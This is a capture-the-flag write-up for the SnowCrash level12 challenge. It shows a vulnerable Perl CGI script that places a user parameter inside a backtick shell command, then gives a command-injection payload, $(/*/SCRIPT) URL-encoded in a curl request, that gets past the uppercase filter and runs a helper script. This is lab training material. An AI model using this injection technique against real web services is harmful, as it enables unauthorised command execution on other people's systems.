level12@SnowCrash:~$ ls -l
total 4
-rwsr-sr-x+ 1 flag12 level12 464 Mar  5  2016 level12.pl


level12@SnowCrash:~$ cat level12.pl 
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";

sub t {
  $nn = $_[1];
  $xx = $_[0];
  $xx =~ tr/a-z/A-Z/; 
  $xx =~ s/\s.*//;
  @output = `egrep "^$xx" /tmp/xd 2>&1`;
  foreach $line (@output) {
      ($f, $s) = split(/:/, $line);
      if($s =~ $nn) {
          return 1;
      }
  }
  return 0;
}

sub n {
  if($_[0] == 1) {
      print("..");
  } else {
      print(".");
  }    
}

n(t(param("x"), param("y")));


The variable x will be turned to uppercase and everything after the first whitespace will be deleted.

But it is vulnerable to injection.

So we must find a way to execute getflag using only uppercase caracters

So we make a script in /tmp/SCRIPT :

#!/bin/sh

getflag > /tmp/flag

chmod 777 /tmp/SCRIPT

And now we can call : curl "localhost:4646?x=%24%28%2F*%2FSCRIPT%29&y=yes"

%24%28%2F*%2FSCRIPT%29 will be interpreted as $(/*/SCRIPT)